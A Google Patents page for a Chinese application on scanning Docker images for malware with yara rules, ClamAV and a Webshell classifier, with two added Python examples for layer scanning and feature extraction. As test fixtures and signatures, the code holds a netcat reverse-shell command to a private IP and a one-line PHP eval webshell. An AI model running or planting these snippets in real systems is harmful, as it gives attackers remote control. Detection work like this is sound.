CN110210225A - An intelligent Docker container malicious file detection method and device - Google Patents


Info

Publication number
CN110210225A
Authority
CN (China)
Prior art keywords
file, web page, detection result, document, docker container
Legal status
Pending
Application number
CN201910445566.8A
Other languages
Chinese (zh)
Inventors
黄诚, 谢逸, 黄德禄, 崔韩东
Current Assignee
Sichuan University; Sun Yat Sen University; National Sun Yat Sen University
Original Assignee
Sichuan University; National Sun Yat Sen University
Application filed by Sichuan University and National Sun Yat Sen University
Priority to CN201910445566.8A
Publication of CN110210225A

Classifications

    • G06F21/561 Virus type analysis (G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity > G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems > G06F21/55 Detecting local intrusion or implementing counter-measures > G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements)
    • G06F21/562 Static detection (same hierarchy as above, under G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements)
    • G06F9/45558 Hypervisor-specific management and integration aspects (G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F9/00 Arrangements for program control, e.g. control units > G06F9/06 Arrangements for program control using stored programs, i.e. using an internal store of processing equipment to receive or retain programs > G06F9/44 Arrangements for executing specific programs > G06F9/455 Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines > G06F9/45533 Hypervisors; Virtual machine monitors)

Abstract

This application relates to the field of computer technology and provides an intelligent Docker container malicious file detection method and device. The method is applied to a server and comprises: obtaining multiple files from the original image of a target Docker container, the target Docker container being the Docker container to be detected; for each file of the multiple files, detecting the file with malicious file signatures based on yara rules to judge whether the file is a malicious file, obtaining a first detection result; for each file of the multiple files, detecting the file with antivirus software to judge whether the file is a malicious file, obtaining a second detection result; obtaining multiple web page files from the original image of the target Docker container; and, for each web page file of the multiple web page files, inputting the web page file into a web page classification model to detect whether the web page is a Webshell web page backdoor file, obtaining a third detection result.

Description

An intelligent Docker container malicious file detection method and device
Technical field
This application relates to the field of computer technology, in particular to an intelligent Docker container malicious file detection method and device.
Background art
Docker is a container engine that depends on the Linux kernel. It is released under the Apache 2.0 open-source licence and enables fast, automated deployment of container-based applications. Docker consists mainly of five parts: the client, the daemon, images, containers and the image registry, and provides a simple, lightweight packaging model. An image is, on the one hand, like a class in object-oriented programming, that is, a template; on the other hand it is also a file system which, in addition to the programs, libraries, resources and configuration files a container needs at run time, also carries configuration parameters prepared for run time (such as anonymous volumes, environment variables and the user). A container is the entity created from an image used as its template.
Alongside the rapid development of Docker container technology, Docker container security has become a focus of user attention, and more and more potential Docker security problems are emerging. For images, the main security problems are: developers easily leave sensitive information such as database passwords behind when building an image; and whether an image comes from the official registry or from the community, the image itself may contain many vulnerabilities that lead to risk. Although images are very efficient to transfer and deploy, they also make it convenient to spread malicious files such as viruses and backdoors.
Summary of the invention
In view of this, the embodiments of the present application provide an intelligent Docker container malicious file detection method and device, which aim to perform security detection on the original image of a Docker container from several aspects, so as to detect malicious files in the original image of the Docker container more thoroughly.
A first aspect of the embodiments of the present application provides an intelligent Docker container malicious file detection method. The method is applied to a server and comprises:
obtaining multiple files from the original image of a target Docker container, the target Docker container being the Docker container to be detected;
for each file of the multiple files, detecting the file with malicious file signatures based on yara rules to judge whether the file is a malicious file, obtaining a first detection result;
for each file of the multiple files, detecting the file with antivirus software to judge whether the file is a malicious file, obtaining a second detection result;
obtaining multiple web page files from the original image of the target Docker container;
for each web page file of the multiple web page files, inputting the web page file into a web page classification model to detect whether the web page is a Webshell web page backdoor file, obtaining a third detection result.
Optionally, the method further comprises:
obtaining multiple sample web page files, each sample web page file of the multiple sample web page files carrying a label that characterises the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files;
training a preset model with the multiple sample web page files as input to obtain the web page classification model, the web page classification model being used to judge whether a single web page file is a Webshell web page backdoor file.
Optionally, the static features include at least one of the following: information entropy, index of coincidence, longest word length, number of dangerous functions, file compression ratio and number of eval function calls.
Optionally, for each file of the multiple files, detecting the file with malicious file signatures based on yara rules to judge whether the file is a malicious file comprises:
obtaining multiple published malicious file signatures based on yara rules and establishing a yara rule base;
for each file of the multiple files, detecting whether the file contains a malicious file signature from the yara rule base, wherein the file is determined to be a malicious file when it contains a malicious file signature from the yara rule base.
Optionally, the server communicates with a client, and the method further comprises:
receiving the original image of the target Docker container sent by the client;
sending the first detection result, the second detection result and the third detection result to the client.
Optionally, the server communicates with a database, and the method further comprises:
storing the first detection result, the second detection result and the third detection result in the database, so that the client obtains the first detection result, the second detection result and the third detection result through the database.
A second aspect of the embodiments of the present application provides an intelligent Docker container malicious file detection device. The device is applied to a server and comprises:
a first obtaining module, for obtaining multiple files from the original image of a target Docker container, the target Docker container being the Docker container to be detected;
a first detection module, for detecting, for each file of the multiple files, the file with malicious file signatures based on yara rules to judge whether the file is a malicious file, obtaining a first detection result;
a second detection module, for detecting, for each file of the multiple files, the file with antivirus software to judge whether the file is a malicious file, obtaining a second detection result;
a second obtaining module, for obtaining multiple web page files from the original image of the target Docker container;
a third detection module, for inputting, for each web page file of the multiple web page files, the web page file into a web page classification model to detect whether the web page is a Webshell web page backdoor file, obtaining a third detection result.
Optionally, the device further comprises:
a third obtaining module, for obtaining multiple sample web page files, each sample web page file of the multiple sample web page files carrying a label that characterises the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files;
a training module, for training a preset model with the multiple sample web page files as input to obtain the web page classification model, the web page classification model being used to judge whether a single web page file is a Webshell web page backdoor file.
Optionally, the first detection module comprises:
an establishing submodule, for obtaining multiple published malicious file signatures based on yara rules and establishing a yara rule base;
a detection submodule, for detecting, for each file of the multiple files, whether the file contains a malicious file signature from the yara rule base, wherein the file is determined to be a malicious file when it contains a malicious file signature from the yara rule base.
Optionally, the server communicates with a client, and the device further comprises:
a receiving module, for receiving the original image of the target Docker container sent by the client;
a sending module, for sending the first detection result, the second detection result and the third detection result to the client.
With the intelligent Docker container malicious file detection method provided by the embodiments of the present application, the server detects the multiple files in the original image of the target Docker container with malicious file signatures based on yara rules and with antivirus software, and also inputs the web page files into the web page classification model to detect whether a web page is a Webshell web page backdoor file.
On the one hand, the server detects the multiple files in the original image of the target Docker container from several dimensions, specifically with several detection means such as malicious file signatures, antivirus software and the web page classification model. Each detection means detects the malicious files it is suited to, so that malicious files in the original image of the Docker container are detected more thoroughly.
On the other hand, when the server detects the multiple files in the original image of the target Docker container with detection means such as malicious file signatures and antivirus software, it can detect known malicious files. For currently unknown malicious files, the server uses the web page classification model on the web page files in the original image of the target Docker container and thereby predicts currently unknown malicious files. The server thus achieves intelligent detection of currently unknown malicious files, and the reliability of its detection function is improved.
Detailed description of the invention
In order to explain the technical solutions of the embodiments of the present application more clearly, the drawings needed in the description of the embodiments are briefly introduced below. Obviously, the drawings in the following description are only some embodiments of the present application; for a person of ordinary skill in the art, other drawings can be obtained from these drawings without creative effort.
Fig. 1 is a flow chart of the intelligent Docker container malicious file detection method proposed by an embodiment of the present application;
Fig. 2 is a flow chart of the method for training the web page classification model proposed by an embodiment of the present application;
Fig. 3 is a schematic diagram of the intelligent Docker container malicious file detection device provided by an embodiment of the present application.
Specific embodiment
The technical solutions in the embodiments of the present application are described clearly and completely below with reference to the drawings in the embodiments. Obviously, the described embodiments are only some, not all, of the embodiments of the present application. All other embodiments obtained by a person of ordinary skill in the art based on the embodiments of the present application without creative effort fall within the protection scope of the present application.
With reference to Fig. 1, Fig. 1 is a flow chart of the intelligent Docker container malicious file detection method proposed by an embodiment of the present application; the method is applied to a server. As shown in Fig. 1, the method comprises the following steps:
S11: obtaining multiple files from the original image of the target Docker container, the target Docker container being the Docker container to be detected.
In this embodiment, the original image of the target Docker container refers to the image used when the target Docker container was created.
In this embodiment, the server may communicate with a client and may obtain the original image of the target Docker container by receiving it from the client. The server unpacks the obtained original image and thereby obtains the multiple files in it. Because the server is connected to the client and receives the original image of the target Docker container sent by the client, it can detect the security of Docker containers in the client's local environment. On the one hand, the client can have the server detect the security of the Docker containers in its local environment, so the client's host need not perform the detection itself, which reduces the client's operating load. On the other hand, the server can collect and collate the malicious files detected in the original images sent by multiple clients, which further improves the server's own detection capability.
Illustratively, the client provides the user with a UI (User Interface) and detects the images in the local environment (that is, the client's host); the client presents the images downloaded on the machine to the user as a list. The client receives the user's selection of certain images and transmits the selected images to the server. After the packed image has been transferred, the server returns a message to the client indicating that the transfer succeeded. When the client receives this message it enters the detection loading interface and at the same time sends a detection request to the server.
S12: for each file of the multiple files, detecting the file with malicious file signatures based on yara rules to judge whether the file is a malicious file, obtaining a first detection result.
In this embodiment, the first detection result characterises how many malicious files there are among the multiple files.
Illustratively, if, after each file of the multiple files has been detected with the malicious file signatures based on yara rules, 2 malicious files are detected in total, the first detection result may be "2". Alternatively, the first detection result is presented as a security score: for example, the full score is 100 points and 10 points are deducted for each malicious file detected, so that if 2 malicious files are detected in total after each file has been detected with the yara-rule signatures, the first detection result is "80 points".
In this embodiment, detecting each file of the multiple files with malicious file signatures based on yara rules may specifically include the following steps:
S121: obtaining multiple published malicious file signatures based on yara rules and establishing a yara rule base;
S122: for each file of the multiple files, detecting whether the file contains a malicious file signature from the yara rule base, wherein the file is determined to be a malicious file when it contains a malicious file signature from the yara rule base.
Illustratively, the server obtains malicious file signatures based on yara rules from multiple published yara rule sources to establish its own local yara rule base. For each file of the multiple files, the server matches the file's signature one by one against the multiple malicious file signatures in the local yara rule base; when the file's signature matches a certain malicious file signature, that is, the file contains a malicious file signature from the yara rule base, the file is determined to be a malicious file.
S13: for each file of the multiple files, detecting the file with antivirus software to judge whether the file is a malicious file, obtaining a second detection result.
In this embodiment, the second detection result characterises how many malicious files there are among the multiple files.
Illustratively, if, after each file of the multiple files has been detected with the antivirus software, 1 malicious file is detected in total, the second detection result may be "1". Alternatively, the second detection result is presented as a security score: for example, the full score is 100 points and 10 points are deducted for each malicious file detected, so that if 1 malicious file is detected in total after each file has been detected with the antivirus software, the second detection result is "90 points".
Illustratively, for each file of the multiple files, the server detects the file in turn with the open-source antivirus software ClamAV and obtains ClamAV's output, thereby detecting malicious files. The open-source antivirus software ClamAV can find as many as possible of the malicious files present in the multiple files of the original image of the Docker container and helps achieve automatic identification of known malicious files such as known samples and backdoor programs.
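The following Python is an added worked example, not code from the patent, covering steps S11 to S13 on an image in `docker save` layout: it replays the layers listed in manifest.json, applies overlay whiteout entries, matches every file against a signature set and derives both the count and the score form of the first detection result. The signature dictionary, the file names and layer contents, and the reverse-shell and eval patterns are all constructed for the example. A real deployment would replace the byte-pattern matching with yara-python (yara.compile(source=...) followed by rules.match(data=...)) and pass the same bytes to ClamAV (for instance through clamd's INSTREAM command) to obtain the second detection result.

```python
import io
import json
import posixpath
import tarfile

# Constructed stand-in for the yara rule base of S121: plain byte patterns.
# A real scanner compiles YARA rules with yara-python
# (rules = yara.compile(source=...); rules.match(data=blob)) and feeds the
# same blob to ClamAV (clamd INSTREAM) for the second detection result.
SIGNATURES = {
    "php_eval_base64": b"eval(base64_decode(",
    "reverse_shell_nc": b"nc -e /bin/sh",
}


def _tar_bytes(entries):
    """Pack {path: bytes} into an uncompressed tar archive held in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_image():
    """Constructed two-layer image in `docker save` layout: manifest.json plus
    one layer.tar per layer. Layer 2 adds a webshell and deletes layer 1's
    dropper with an overlay whiteout entry (.wh.<name>)."""
    layer1 = _tar_bytes({
        "var/www/html/index.php": b"<?php echo 'hello'; ?>\n",
        "tmp/old.sh": b"#!/bin/sh\nnc -e /bin/sh 10.0.0.1 4444\n",
    })
    layer2 = _tar_bytes({
        "tmp/.wh.old.sh": b"",
        "var/www/html/shell.php": b"<?php @eval(base64_decode($_POST['c'])); ?>\n",
    })
    manifest = [{"Config": "cfg.json", "Layers": ["l1/layer.tar", "l2/layer.tar"]}]
    return _tar_bytes({
        "manifest.json": json.dumps(manifest).encode(),
        "cfg.json": b"{}",
        "l1/layer.tar": layer1,
        "l2/layer.tar": layer2,
    })


def _clean_path(name):
    """Normalise a tar member name; reject absolute or parent-escaping paths,
    which an attacker-controlled image can contain."""
    path = posixpath.normpath(name.lstrip("/"))
    if path in (".", "..") or path.startswith("../"):
        return None
    return path


def extract_rootfs(image_bytes, apply_whiteouts=True):
    """Replay the layers in manifest order and return {path: bytes}.
    With apply_whiteouts=False, files deleted by a later layer are kept:
    their bytes are still inside the image and should still be scanned."""
    rootfs = {}
    with tarfile.open(fileobj=io.BytesIO(image_bytes)) as img:
        manifest = json.load(img.extractfile("manifest.json"))
        for layer_name in manifest[0]["Layers"]:
            layer_blob = img.extractfile(layer_name).read()
            with tarfile.open(fileobj=io.BytesIO(layer_blob)) as layer:
                for member in layer.getmembers():
                    path = _clean_path(member.name)
                    if path is None:
                        continue
                    parent, _, base = path.rpartition("/")
                    prefix = parent + "/" if parent else ""
                    if base == ".wh..wh..opq":  # opaque dir: hide lower contents
                        if apply_whiteouts:
                            rootfs = {p: d for p, d in rootfs.items()
                                      if not p.startswith(prefix)}
                    elif base.startswith(".wh."):  # whiteout of a single entry
                        if apply_whiteouts:
                            target = prefix + base[len(".wh."):]
                            rootfs = {p: d for p, d in rootfs.items()
                                      if p != target and not p.startswith(target + "/")}
                    elif member.isfile():
                        rootfs[path] = layer.extractfile(member).read()
    return rootfs


def scan_files(rootfs, signatures=SIGNATURES):
    """First detection result as a list of (path, signature name) hits."""
    return [(path, sig) for path in sorted(rootfs)
            for sig, pattern in signatures.items() if pattern in rootfs[path]]


def security_score(hits, penalty=10):
    """Score form of the result: 100 points minus 10 per malicious file."""
    return max(0, 100 - penalty * len(hits))


if __name__ == "__main__":
    image = build_sample_image()
    for flag in (True, False):
        fs = extract_rootfs(image, apply_whiteouts=flag)
        hits = scan_files(fs)
        print(f"apply_whiteouts={flag}: {len(fs)} files, hits={hits}, "
              f"score={security_score(hits)}")
```

Scanning only the flattened root file system misses a file that a later layer removed with a whiteout: its bytes are still in the lower layer's tar and are restored by anyone who pulls the image history, so a scanner should walk every layer (apply_whiteouts=False) as well as the final view. Member names are normalised before use because an image is attacker-controlled input and a layer tar can carry absolute or `..` paths.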
S14: obtaining multiple web page files from the original image of the target Docker container.
In this embodiment, the server may communicate with a client and may obtain the original image of the target Docker container by receiving it from the client. The server unpacks the obtained original image to obtain all files in it, and filters out from them all web page files in the original image of the target Docker container.
S15: for each web page file of the multiple web page files, inputting the web page file into the web page classification model to detect whether the web page is a Webshell web page backdoor file, obtaining a third detection result.
In this embodiment, the third detection result characterises how many Webshell web page backdoor files there are among the multiple web page files.
Illustratively, if, after each web page file of the multiple web page files has been detected with the web page classification model, 2 Webshell web page backdoor files are detected in total, the third detection result may be "2". Alternatively, the third detection result is presented as a security score: for example, the full score is 100 points and 10 points are deducted for each Webshell web page backdoor file detected, so that if 2 Webshell web page backdoor files are detected in total after each web page file has been detected with the web page classification model, the third detection result is "80 points".
In this embodiment, the web page classification model is obtained beforehand by training a preset model. During training, multiple sample web page files are obtained, each sample web page file of the multiple sample web page files carrying a label that characterises the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files. The preset model is trained with the multiple sample web page files as input to obtain the web page classification model, which is used to judge whether a single web page file is a Webshell web page backdoor file. The static features include at least one of the following: information entropy, index of coincidence, longest word length, number of dangerous functions, file compression ratio and number of eval function calls (eval being a function of the programming language).
With reference to Fig. 2, Fig. 2 is a flow chart of the method for training the web page classification model proposed by an embodiment of the present application. Specifically, during training a number of Webshell web page backdoor file samples and a number of normal web page file samples are collected, and static features that are effective for malicious files, such as information entropy, index of coincidence, longest word length, number of dangerous functions, file compression ratio and number of eval function calls, are extracted manually from each sample to form a feature matrix. The feature matrix is used as the model's input data and the preset model is trained with the random forest algorithm to obtain the web page classification model. Through the web page classification model the server detects unknown malicious files in the original image of the Docker container.
This embodiment uses machine learning to make predictions about web page files outside the scope of the yara rule base and the antivirus software, so that Webshell web page backdoor files which the yara rule base and the antivirus software cannot detect are detected more comprehensively and thoroughly, further improving the recall of security problems in the target Docker container.
In the method comprising steps S11 to S15 above, steps S11 to S13 embody the server's ability to detect known malicious files among multiple files, and steps S14 to S15 embody the server's ability to detect unknown Webshell web page backdoor files among multiple web page files.
With the method comprising steps S11 to S15 above, on the one hand, the server detects the multiple files in the original image of the target Docker container with several detection means such as malicious file signatures, antivirus software and the web page classification model. Each detection means detects the malicious files it is suited to, so that malicious files in the original image of the Docker container are detected more thoroughly.
On the other hand, when the server detects the multiple files in the original image of the target Docker container with detection means such as malicious file signatures and antivirus software, it can detect known malicious files. For currently unknown malicious files, the server uses the web page classification model on the web page files in the original image of the target Docker container and thereby predicts currently unknown malicious files. The server thus achieves intelligent detection of currently unknown malicious files, and the reliability of its detection function is improved.
After obtaining the first detection result, the second detection result and the third detection result through steps S11 to S15, the server also sends the first detection result, the second detection result and the third detection result to the client.
In addition, the server may also communicate with a database. After steps S11 to S15 the server stores the first detection result, the second detection result and the third detection result obtained in the database, so that the client can obtain the first detection result, the second detection result and the third detection result through the database.
Based on the same inventive concept, an embodiment of the present application provides an intelligent Docker container malicious file detection device. With reference to Fig. 3, Fig. 3 is a schematic diagram of the intelligent Docker container malicious file detection device provided by an embodiment of the present application. As shown in Fig. 3, the device comprises:
a first obtaining module 31, for obtaining multiple files from the original image of a target Docker container, the target Docker container being the Docker container to be detected;
a first detection module 32, for detecting, for each file of the multiple files, the file with malicious file signatures based on yara rules to judge whether the file is a malicious file, obtaining a first detection result;
a second detection module 33, for detecting, for each file of the multiple files, the file with antivirus software to judge whether the file is a malicious file, obtaining a second detection result;
a second obtaining module 34, for obtaining multiple web page files from the original image of the target Docker container;
a third detection module 35, for inputting, for each web page file of the multiple web page files, the web page file into a web page classification model to detect whether the web page is a Webshell web page backdoor file, obtaining a third detection result.
Optionally, the device further comprises:
a third obtaining module, for obtaining multiple sample web page files, each sample web page file of the multiple sample web page files carrying a label that characterises the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files;
a training module, for training a preset model with the multiple sample web page files as input to obtain the web page classification model, the web page classification model being used to judge whether a single web page file is a Webshell web page backdoor file.
Optionally, the first detection module comprises:
an establishing submodule, for obtaining multiple published malicious file signatures based on yara rules and establishing a yara rule base;
a detection submodule, for detecting, for each file of the multiple files, whether the file contains a malicious file signature from the yara rule base, wherein the file is determined to be a malicious file when it contains a malicious file signature from the yara rule base.
Optionally, the server communicates with a client, and the device further comprises:
a receiving module, for receiving the original image of the target Docker container sent by the client;
a sending module, for sending the first detection result, the second detection result and the third detection result to the client.
Since the device embodiment is basically similar to the method embodiment, it is described relatively briefly; for related details, refer to the corresponding part of the description of the method embodiment.
The embodiments in this specification are described in a progressive manner; each embodiment focuses on its differences from the other embodiments, and the same or similar parts of the embodiments may be referred to one another.
Those skilled in the art should understand that the embodiments of the present application may be provided as a method, a device or a computer program product. Therefore, the embodiments of the present application may take the form of an entirely hardware embodiment, an entirely software embodiment, or an embodiment combining software and hardware aspects. Moreover, the embodiments of the present application may take the form of a computer program product implemented on one or more computer-usable storage media (including but not limited to disk storage, CD-ROM and optical storage) containing computer-usable program code.
The embodiments of the present application are described with reference to flow charts and/or block diagrams of the method, terminal device (system) and computer program product according to the embodiments of the present application. It should be understood that each flow and/or block in the flow charts and/or block diagrams, and combinations of flows and/or blocks in the flow charts and/or block diagrams, can be implemented by computer program instructions. These computer program instructions may be provided to the processor of a general-purpose computer, a special-purpose computer, an embedded processor or another programmable data processing terminal device to produce a machine, so that the instructions executed by the processor of the computer or other programmable data processing terminal device produce a device for realising the functions specified in one or more flows of the flow chart and/or one or more blocks of the block diagram.
These computer program instructions may also be stored in a computer-readable memory that can direct a computer or other programmable data processing terminal device to operate in a specific manner, so that the instructions stored in the computer-readable memory produce an article of manufacture including an instruction device, which realises the functions specified in one or more flows of the flow chart and/or one or more blocks of the block diagram.
These computer program instructions may also be loaded onto a computer or other programmable data processing terminal device, so that a series of operational steps are executed on the computer or other programmable terminal device to produce computer-implemented processing, whereby the instructions executed on the computer or other programmable terminal device provide steps for realising the functions specified in one or more flows of the flow chart and/or one or more blocks of the block diagram.
Although preferred embodiments of the present application have been described, those skilled in the art can make additional changes and modifications to these embodiments once they know the basic inventive concept. Therefore, the appended claims are intended to be interpreted as including the preferred embodiments and all changes and modifications that fall within the scope of the embodiments of the present application.
Finally, it should be noted that, herein, relational terms such as first and second are used merely to distinguish one entity or operation from another entity or operation, and do not necessarily require or imply any actual relationship or order between these entities or operations. Moreover, the terms "comprise", "include" or any other variant thereof are intended to cover a non-exclusive inclusion, so that a process, method, article or terminal device comprising a series of elements comprises not only those elements but also other elements not explicitly listed, or elements inherent to such a process, method, article or terminal device. In the absence of further restrictions, an element defined by the phrase "comprising a ..." does not exclude the presence of other identical elements in the process, method, article or terminal device comprising that element.
The intelligent Docker container malicious file detection method and device provided by the present application have been described in detail above. Specific examples have been used herein to explain the principles and implementation of the present application; the description of the above embodiments is only intended to help understand the method of the present application and its core idea. At the same time, for those skilled in the art, there will be changes in the specific implementation and scope of application according to the idea of the present application. In summary, the content of this specification should not be construed as limiting the present application.

Claims (10)

1. An intelligent Docker container malicious file detection method, characterized in that it is applied to a server and the method comprises:
obtaining multiple files in the original image of a target Docker container, the target Docker container being the Docker container to be detected;
for each file among the multiple files, detecting the file using malicious file signatures based on yara rules, so as to judge whether the file is a malicious file, and obtaining a first detection result;
for each file among the multiple files, detecting the file using antivirus software, so as to judge whether the file is a malicious file, and obtaining a second detection result;
obtaining multiple web page files in the original image of the target Docker container;
for each web page file among the multiple web page files, inputting the web page file into a web page classification model, so as to detect whether the web page is a Webshell web page backdoor file, and obtaining a third detection result.
2. The method according to claim 1, characterized in that the method further comprises:
obtaining multiple sample web page files, each sample web page file among the multiple sample web page files carrying a label, the label characterizing the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files;
training a preset model with the multiple sample web page files as input to obtain the web page classification model, the web page classification model being used to judge whether a single web page file is a Webshell web page backdoor file.
3. The method according to claim 2, characterized in that the static features include at least one of the following features: information entropy, index of coincidence, maximum word length, number of dangerous functions, file compression rate, and number of eval functions.
4. The method according to claim 1, characterized in that, for each file among the multiple files, detecting the file using malicious file signatures based on yara rules so as to judge whether the file is a malicious file comprises:
obtaining multiple publicly disclosed malicious file signatures based on yara rules, and establishing a yara rule base;
for each file among the multiple files, detecting whether the file contains a malicious file signature from the yara rule base, wherein when the file contains a malicious file signature from the yara rule base, the file is determined to be a malicious file.
5. The method according to any one of claims 1 to 4, characterized in that the server is in communication connection with a client; the method further comprises:
receiving the original image of the target Docker container sent by the client;
sending the first detection result, the second detection result, and the third detection result to the client.
6. The method according to claim 5, characterized in that the server is in communication connection with a database; the method further comprises:
storing the first detection result, the second detection result, and the third detection result in the database, so that the client obtains the first detection result, the second detection result, and the third detection result through the database.
7. An intelligent Docker container malicious file detection device, characterized in that it is applied to a server and the device comprises:
a first obtaining module, for obtaining multiple files in the original image of a target Docker container, the target Docker container being the Docker container to be detected;
a first detection module, for detecting, for each file among the multiple files, the file using malicious file signatures based on yara rules, so as to judge whether the file is a malicious file, and obtaining a first detection result;
a second detection module, for detecting, for each file among the multiple files, the file using antivirus software, so as to judge whether the file is a malicious file, and obtaining a second detection result;
a second obtaining module, for obtaining multiple web page files in the original image of the target Docker container;
a third detection module, for inputting, for each web page file among the multiple web page files, the web page file into a web page classification model, so as to detect whether the web page is a Webshell web page backdoor file, and obtaining a third detection result.
8. The device according to claim 7, characterized in that the device further comprises:
a third obtaining module, for obtaining multiple sample web page files, each sample web page file among the multiple sample web page files carrying a label, the label characterizing the static features of the sample web page file, wherein a part of the multiple sample web page files are Webshell web page backdoor files;
a training module, for training a preset model with the multiple sample web page files as input to obtain the web page classification model, the web page classification model being used to judge whether a single web page file is a Webshell web page backdoor file.
9. The device according to claim 7, characterized in that the first detection module comprises:
an establishing submodule, for obtaining multiple publicly disclosed malicious file signatures based on yara rules and establishing a yara rule base;
a detection submodule, for detecting, for each file among the multiple files, whether the file contains a malicious file signature from the yara rule base, wherein when the file contains a malicious file signature from the yara rule base, the file is determined to be a malicious file.
10. The device according to claim 7, characterized in that the server is in communication connection with a client, and the device further comprises:
a receiving module, for receiving the original image of the target Docker container sent by the client;
a sending module, for sending the first detection result, the second detection result, and the third detection result to the client.
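Claims 2 and 3 describe training a classifier on labelled web page files represented by six static features, but the page does not say how those features are computed. The following Python is an added example, not code from the patent or its authors: it computes one plausible reading of each feature named in claim 3 (information entropy, index of coincidence, maximum word length, number of dangerous functions, file compression rate, number of eval functions) and emits the labelled feature rows a preset model would be trained on. The list of "dangerous" PHP function names and both sample files are constructed assumptions; the suspicious sample's encoded blob is random filler, not a payload, chosen only so that the lexical traits the features measure are visible.

```python
"""Static web page features for Webshell classification (claims 2 and 3).

Added example; not the patent's own implementation. The feature definitions
below are assumptions about what the claim's feature names mean.
"""
import math
import re
import zlib
from collections import Counter

# Assumption: PHP functions commonly treated as "dangerous" by static
# Webshell detectors. The patent does not enumerate them.
DANGEROUS_FUNCTIONS = (
    "eval", "assert", "system", "exec", "shell_exec", "passthru",
    "popen", "proc_open", "base64_decode", "gzinflate", "str_rot13",
    "create_function", "preg_replace",
)
# Match a listed name only when it is used as a call: name followed by "(".
_DANGEROUS_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, DANGEROUS_FUNCTIONS)) + r")\s*\(",
    re.IGNORECASE,
)
_EVAL_RE = re.compile(r"\beval\s*\(", re.IGNORECASE)


def information_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for an empty or single-symbol file."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def index_of_coincidence(data: bytes) -> float:
    """Probability that two bytes drawn without replacement are equal.
    Random or encoded data scores near 1/256; source text scores much higher."""
    n = len(data)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(data).values()) / (n * (n - 1))


def max_word_length(text: str) -> int:
    """Longest whitespace-delimited token; long encoded blobs stand out here."""
    return max((len(w) for w in text.split()), default=0)


def dangerous_function_count(text: str) -> int:
    """Number of call sites of names in DANGEROUS_FUNCTIONS."""
    return len(_DANGEROUS_RE.findall(text))


def compression_rate(data: bytes) -> float:
    """Compressed size divided by original size; encoded payloads compress poorly."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def eval_count(text: str) -> int:
    """Number of eval(...) call sites."""
    return len(_EVAL_RE.findall(text))


def extract_features(data: bytes) -> dict:
    """All six claim-3 features for one web page file."""
    text = data.decode("utf-8", errors="replace")
    return {
        "entropy": information_entropy(data),
        "index_of_coincidence": index_of_coincidence(data),
        "max_word_length": max_word_length(text),
        "dangerous_functions": dangerous_function_count(text),
        "compression_rate": compression_rate(data),
        "eval_count": eval_count(text),
    }


def feature_vector(data: bytes) -> list:
    """Fixed-order numeric vector, the form a classifier consumes."""
    f = extract_features(data)
    return [f["entropy"], f["index_of_coincidence"], f["max_word_length"],
            f["dangerous_functions"], f["compression_rate"], f["eval_count"]]


# Constructed sample web page files (not taken from any real image).
BENIGN_PHP = b"""<?php
// Constructed benign page: renders a greeting.
$name = htmlspecialchars($_GET['name'] ?? 'guest');
echo "<h1>Hello, " . $name . "</h1>";
?>
"""

# Constructed suspicious page. The blob is random letters, not a payload; it is
# here so that the long-token, entropy and eval-count features have something to see.
SUSPICIOUS_PHP = b"""<?php
$p = "Q2h6OVprM3p4d1Z5b2xUbFF1Um9NaGlrOFhpdG1xZ2RUUm9ZbW10QWh5Nk1ha0JJdVlaQ1B0V2V1Vnp5c1h6b0xjWklrb2tZdXJ0aG5hTUxjUGprMW9EUDFtalJHOTg5SEFyUXVXZ2Q=";
eval(base64_decode($p));
?>
"""


def labelled_training_rows():
    """(feature_vector, label) rows as claim 2 describes; label 1 = Webshell."""
    return [(feature_vector(BENIGN_PHP), 0), (feature_vector(SUSPICIOUS_PHP), 1)]


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PHP), ("suspicious", SUSPICIOUS_PHP)):
        print(name, extract_features(blob))
```

The rows from `labelled_training_rows()` are what a "preset model" in claim 2 would be fitted on; any tabular classifier that accepts a fixed-length numeric vector fits the claim, and the page names none in particular.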
CN201910445566.8A 2019-05-27 2019-05-27 A kind of intelligentized Docker container malicious file detection method and device Pending CN110210225A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910445566.8A CN110210225A (en) 2019-05-27 2019-05-27 A kind of intelligentized Docker container malicious file detection method and device

Publications (1)

Publication Number Publication Date
CN110210225A true CN110210225A (en) 2019-09-06

Family

ID=67788697

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910445566.8A Pending CN110210225A (en) 2019-05-27 2019-05-27 A kind of intelligentized Docker container malicious file detection method and device

Country Status (1)

Country Link
CN (1) CN110210225A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110851824A (en) * 2019-11-13 2020-02-28 哈尔滨工业大学 Detection method for malicious container
CN112560018A (en) * 2020-12-23 2021-03-26 苏州三六零智能安全科技有限公司 Sample file detection method and device, terminal equipment and storage medium
CN113407935A (en) * 2021-06-16 2021-09-17 中国光大银行股份有限公司 File detection method and device, storage medium and server

Citations (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
